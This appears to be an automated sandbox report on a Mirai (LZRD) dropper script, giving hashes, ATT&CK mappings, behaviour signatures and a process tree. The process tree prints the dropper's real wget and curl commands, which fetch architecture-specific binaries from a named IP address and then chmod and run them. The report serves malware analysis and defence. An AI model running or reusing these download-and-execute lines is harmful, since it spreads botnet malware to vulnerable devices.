mirai | 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c

Analysis

max time kernel
149s
max time network
159s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
22-12-2024 02:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh
Size

2KB
MD5

4e3d079076dbd0da4d36211e359e7c90
SHA1

c78fc85b3cb983b5f6da054337221b744ffce6f2
SHA256

21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c
SHA512

85a322f9c2d9cae35021d896ca50f254b49354d2819f77396a97a9d41a544d8662ec0cdd38475884b9bab02f9247c9ed637fa9caa26d4669b8f5e32a739ec78b

Score

10^/10

mirai lzrd antivm botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
839	chmod
856	chmod
683	chmod
779	chmod
824	chmod
697	chmod
791	chmod
829	chmod
850	chmod
785	chmod
796	chmod
845	chmod
758	chmod
804	chmod
817	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/Space	684	Space
/tmp/Space	699	Space
/tmp/Space	760	Space
/tmp/Space	780	Space
/tmp/Space	786	Space
/tmp/Space	792	Space
/tmp/Space	797	Space
/tmp/Space	805	Space
/tmp/Space	818	Space
/tmp/Space	825	Space
/tmp/Space	830	Space
/tmp/Space	840	Space
/tmp/Space	846	Space
/tmp/Space	851	Space
/tmp/Space	857	Space

Modifies Watchdog functionality 1 TTPs 4 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	Space
File opened for modification	/dev/misc/watchdog	Space
File opened for modification	/dev/watchdog	Space
File opened for modification	/dev/misc/watchdog	Space

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 4 IoCs

description	ioc	Process
File opened for modification	/sbin/watchdog	Space
File opened for modification	/bin/watchdog	Space
File opened for modification	/sbin/watchdog	Space
File opened for modification	/bin/watchdog	Space

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/fstream-5.dat	upx
behavioral2/files/fstream-6.dat	upx
behavioral2/files/fstream-7.dat	upx
behavioral2/files/fstream-8.dat	upx

Checks CPU configuration 1 TTPs 15 IoCs

Checks CPU information which indicate if the system is a virtual machine.

antivm

System Checks

T1497.001

description	ioc	Process
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl
File opened for reading	/proc/cpuinfo	curl

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/649/status	Space
File opened for reading	/proc/651/status	Space
File opened for reading	/proc/140/status	Space
File opened for reading	/proc/600/status	Space
File opened for reading	/proc/651/status	Space
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/594/status	Space
File opened for reading	/proc/650/status	Space
File opened for reading	/proc/656/status	Space
File opened for reading	/proc/20/status	Space
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/5/status	Space
File opened for reading	/proc/10/status	Space
File opened for reading	/proc/43/status	Space
File opened for reading	/proc/22/status	Space
File opened for reading	/proc/147/status	Space
File opened for reading	/proc/17/status	Space
File opened for reading	/proc/592/status	Space
File opened for reading	/proc/43/status	Space
File opened for reading	/proc/27/status	Space
File opened for reading	/proc/29/status	Space
File opened for reading	/proc/805/status	Space
File opened for reading	/proc/8/status	Space
File opened for reading	/proc/23/status	Space
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/13/status	Space
File opened for reading	/proc/19/status	Space
File opened for reading	/proc/29/status	Space
File opened for reading	/proc/592/status	Space
File opened for reading	/proc/830/status	Space
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/3/status	Space
File opened for reading	/proc/self/auxv	curl
File opened for reading	/proc/2/status	Space
File opened for reading	/proc/107/status	Space
File opened for reading	/proc/138/status	Space
File opened for reading	/proc/801/status	Space
File opened for reading	/proc/18/status	Space
File opened for reading	/proc/28/status	Space
File opened for reading	/proc/self/exe	Space
File opened for reading	/proc/19/status	Space
File opened for reading	/proc/26/status	Space
File opened for reading	/proc/808/status	Space
File opened for reading	/proc/833/status	Space
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/325/status	Space
File opened for reading	/proc/9/status	Space
File opened for reading	/proc/215/status	Space
File opened for reading	/proc/277/status	Space
File opened for reading	/proc/14/status	Space
File opened for reading	/proc/142/status	Space
File opened for reading	/proc/160/status	Space
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/2/status	Space
File opened for reading	/proc/97/status	Space
File opened for reading	/proc/272/status	Space
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/701/status	Space
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/1/status	Space
File opened for reading	/proc/105/status	Space

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
789	curl
790	cat
782	wget
783	curl
784	cat
788	wget

Writes file to tmp directory 30 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/Space.x86	wget
File opened for modification	/tmp/Space	21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh
File opened for modification	/tmp/Space.mpsl	wget
File opened for modification	/tmp/Space.sparc	curl
File opened for modification	/tmp/Space.m68k	wget
File opened for modification	/tmp/busybox	cp
File opened for modification	/tmp/Space.x86	curl
File opened for modification	/tmp/Space.i686	curl
File opened for modification	/tmp/Space.arm	curl
File opened for modification	/tmp/Space.arm7	wget
File opened for modification	/tmp/Space.ppc	wget
File opened for modification	/tmp/Space.ppc	curl
File opened for modification	/tmp/Space.arc	curl
File opened for modification	/tmp/Space.mips	curl
File opened for modification	/tmp/Space.mips64	curl
File opened for modification	/tmp/Space.arm7	curl
File opened for modification	/tmp/Space.i686	wget
File opened for modification	/tmp/Space.arm	wget
File opened for modification	/tmp/Space.x86_64	wget
File opened for modification	/tmp/Space.arm6	wget
File opened for modification	/tmp/Space.m68k	curl
File opened for modification	/tmp/Space.arc	wget
File opened for modification	/tmp/Space.x86_64	curl
File opened for modification	/tmp/Space.arm6	curl
File opened for modification	/tmp/Space.mips	wget
File opened for modification	/tmp/Space.mpsl	curl
File opened for modification	/tmp/Space.arm5	wget
File opened for modification	/tmp/Space.arm5	curl
File opened for modification	/tmp/Space.sh4	wget
File opened for modification	/tmp/Space.sh4	curl

/tmp/21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh
/tmp/21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh
1⤵
- Writes file to tmp directory
PID:652
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Writes file to tmp directory
  PID:654
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.arc
  2⤵
  - Writes file to tmp directory
  PID:660
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.arc
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:681
- /bin/cat
  cat Space.arc
  2⤵
  PID:682
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc systemd-private-3997322e029e4f1aa34c735df7c89689-systemd-timedated.service-cPTwH4
  2⤵
  - File and Directory Permissions Modification
  PID:683
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:684
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.x86
  2⤵
  - Writes file to tmp directory
  PID:686
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.x86
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:691
- /bin/cat
  cat Space.x86
  2⤵
  PID:696
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.x86 systemd-private-3997322e029e4f1aa34c735df7c89689-systemd-timedated.service-cPTwH4
  2⤵
  - File and Directory Permissions Modification
  PID:697
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:699
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.x86_64
  2⤵
  - Writes file to tmp directory
  PID:702
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.x86_64
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:708
- /bin/cat
  cat Space.x86_64
  2⤵
  PID:757
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.x86 Space.x86_64 systemd-private-3997322e029e4f1aa34c735df7c89689-systemd-timedated.service-cPTwH4
  2⤵
  - File and Directory Permissions Modification
  PID:758
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:760
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.i686
  2⤵
  - Writes file to tmp directory
  PID:762
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.i686
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:767
- /bin/cat
  cat Space.i686
  2⤵
  PID:778
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.i686 Space.x86 Space.x86_64 systemd-private-3997322e029e4f1aa34c735df7c89689-systemd-timedated.service-cPTwH4
  2⤵
  - File and Directory Permissions Modification
  PID:779
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:780
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:782
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.mips
  2⤵
  - Checks CPU configuration
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:783
- /bin/cat
  cat Space.mips
  2⤵
  - System Network Configuration Discovery
  PID:784
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.i686 Space.mips Space.x86 Space.x86_64 systemd-private-3997322e029e4f1aa34c735df7c89689-systemd-timedated.service-cPTwH4
  2⤵
  - File and Directory Permissions Modification
  PID:785
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:786
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.mips64
  2⤵
  - System Network Configuration Discovery
  PID:788
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.mips64
  2⤵
  - Checks CPU configuration
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:789
- /bin/cat
  cat Space.mips64
  2⤵
  - System Network Configuration Discovery
  PID:790
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.i686 Space.mips Space.mips64 Space.x86 Space.x86_64 systemd-private-3997322e029e4f1aa34c735df7c89689-systemd-timedated.service-cPTwH4
  2⤵
  - File and Directory Permissions Modification
  PID:791
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:792
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.mpsl
  2⤵
  - Writes file to tmp directory
  PID:793
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.mpsl
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:794
- /bin/cat
  cat Space.mpsl
  2⤵
  PID:795
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 systemd-private-3997322e029e4f1aa34c735df7c89689-systemd-timedated.service-cPTwH4
  2⤵
  - File and Directory Permissions Modification
  PID:796
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:797
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.arm
  2⤵
  - Writes file to tmp directory
  PID:799
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.arm
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:802
- /bin/cat
  cat Space.arm
  2⤵
  PID:803
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.arm Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64 systemd-private-3997322e029e4f1aa34c735df7c89689-systemd-timedated.service-cPTwH4
  2⤵
  - File and Directory Permissions Modification
  PID:804
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:805
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.arm5
  2⤵
  - Writes file to tmp directory
  PID:814
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.arm5
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:815
- /bin/cat
  cat Space.arm5
  2⤵
  PID:816
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.arm Space.arm5 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:817
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:818
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.arm6
  2⤵
  - Writes file to tmp directory
  PID:819
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.arm6
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:820
- /bin/cat
  cat Space.arm6
  2⤵
  PID:823
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.arm Space.arm5 Space.arm6 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:824
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:825
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.arm7
  2⤵
  - Writes file to tmp directory
  PID:826
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.arm7
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:827
- /bin/cat
  cat Space.arm7
  2⤵
  PID:828
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.x86 Space.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:829
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:830
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.ppc
  2⤵
  - Writes file to tmp directory
  PID:836
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.ppc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:837
- /bin/cat
  cat Space.ppc
  2⤵
  PID:838
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.ppc Space.x86 Space.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:839
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:840
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.sparc
  2⤵
  PID:842
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.sparc
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:843
- /bin/cat
  cat Space.sparc
  2⤵
  PID:844
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.mips Space.mips64 Space.mpsl Space.ppc Space.sparc Space.x86 Space.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:845
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:846
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.m68k
  2⤵
  - Writes file to tmp directory
  PID:847
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.m68k
  2⤵
  - Checks CPU configuration
  - Reads runtime system information
  - Writes file to tmp directory
  PID:848
- /bin/cat
  cat Space.m68k
  2⤵
  PID:849
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.m68k Space.mips Space.mips64 Space.mpsl Space.ppc Space.sparc Space.x86 Space.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:850
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:851
- /usr/bin/wget
  wget http://89.213.158.208/hiddenbin/Space.sh4
  2⤵
  - Writes file to tmp directory
  PID:853
- /usr/bin/curl
  curl -O http://89.213.158.208/hiddenbin/Space.sh4
  2⤵
  - Checks CPU configuration
  - Writes file to tmp directory
  PID:854
- /bin/cat
  cat Space.sh4
  2⤵
  PID:855
- /bin/chmod
  chmod +x 21592f72b78a52cbb31ba42577f0f5316ac4869de1281ad2f7d81f5d970d807c.sh busybox Space Space.arc Space.arm Space.arm5 Space.arm6 Space.arm7 Space.i686 Space.m68k Space.mips Space.mips64 Space.mpsl Space.ppc Space.sh4 Space.sparc Space.x86 Space.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:856
- /tmp/Space
  ./Space
  2⤵
  - Executes dropped EXE
  PID:857

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Credential Access

Discovery

System Network Configuration Discovery

T1016

Virtualization/Sandbox Evasion

T1497

System Checks

T1497.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Space

Filesize
34KB

MD5
f66071f9e603dd7b96793058e206b45c

SHA1
f90eaf59e5a2c5030450de5b1f12a72a8ec8f256

SHA256
8b8facc7fb2d6cd6f278ea77711c41970dcdff8a367d2d04a2221fd4286ffb45

SHA512
d5d307f49f255d8f2e36027cdb5b0b7171f83d99147fb1d074bdb64f4c65fa19a7af2556508e0a317a9a4e0df5bd005b5d1b3396282647d9672b12d916d3fc88

Download Submit
/tmp/Space

Filesize
36KB

MD5
3c733927caaa196b216421abb32e2632

SHA1
0c2443725d846b98d0f43fd04d914fc9f0848595

SHA256
5c26d99fcb4734a9fa1e742d0a2b79de476ad150afd2ab87212766a458eb3475

SHA512
531651740555a3e4291b9de2a326a4dc5e69088e64264827f1a1f32be8882db930f183e8a145967e8d0976119e3e3d21ff95b9fdd80f3a20b63b801b3d790f08

Download Submit
/tmp/Space

Filesize
35KB

MD5
69bb2976de3feee44a259aba3d6e6339

SHA1
5ae7aa7d99a2ec82de2d9a9da57a9acd5176b939

SHA256
fb5e5e67d08d25421f3d1acfea212d860a41c97ffcbd3d30094362cccaaf9d76

SHA512
c3292376c62e324d9b8e6773a78d5d0215feef9f2173f974f5e8ee4bf024aee817e4f6c497a38d285cb00383e28200983fd2be063b384a77d8f7d8c1dfc3388f

Download Submit
/tmp/Space

Filesize
37KB

MD5
a010ddf965c0b627abe851fced83e6fe

SHA1
5fe8eabdce3d9ef71ff19a7fc109b841a958e328

SHA256
3b6b160ecfbb8c22f91a08708aa0a73917ddcfbf15c628af30e3c34257825aae

SHA512
d432b1469b70044a3ca0b61ab8b4294ce89fb53e7991fa14c8b7c06728a46ae81cad82f401dd87ca2e286e2e0e0669380c7cda0a534525cd0831aa2d9d1cdf9c

Download Submit
/tmp/Space

Filesize
82KB

MD5
ee5d58bab852ebdb4db18fe5941b7b11

SHA1
48d40ff4c228571b6a704578cdd5e8505fe7e883

SHA256
2869e0d7e90b1488b774960b8d92a35cb219b5b20de58f3c2b4f7798c4b0d558

SHA512
e58ffb21af892d20ac9655bfa024e10bcdc6e694416988e5bd30004e9c3018141e1d9a3e972096a0d68a01aa5a610f897e8ecd60f8807cac41d903460a67f615

Download Submit
/tmp/Space.arc

Filesize
113KB

MD5
0d7dfd4bb7805b98857a7d2f0a6c736e

SHA1
3dd2688150dae67b47e3a4da289f98f2fc6b3dae

SHA256
fc713acedb272a695f5377591a7110d2061697ef7b5de6852e1132040597a39b

SHA512
03858c754d6469066b8b7b21f8765c24706209e0d9acc3b014014c5a6abd8738f4722d6f2403f85678822021b568834186c6e346dd96b25139c7e4572d3c1899

Download Submit
/tmp/busybox

Filesize
507KB

MD5
e588bcf03ae78237b58899d35f50c570

SHA1
2194732ebbefbc27bdae876c77f2a97a20175710

SHA256
2dd1fbb8052a89f40c2e9af115d31346e554ee746e9c7a97d651e43e0609df88

SHA512
904d906ec73ba5f828ee453acfceaf60d07b337a4baf1a88a2edba8d4568e4a3ceae2e24116af0a5b9c8ad194faa72abb62a72d30ae236b0852827c7bf896555

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads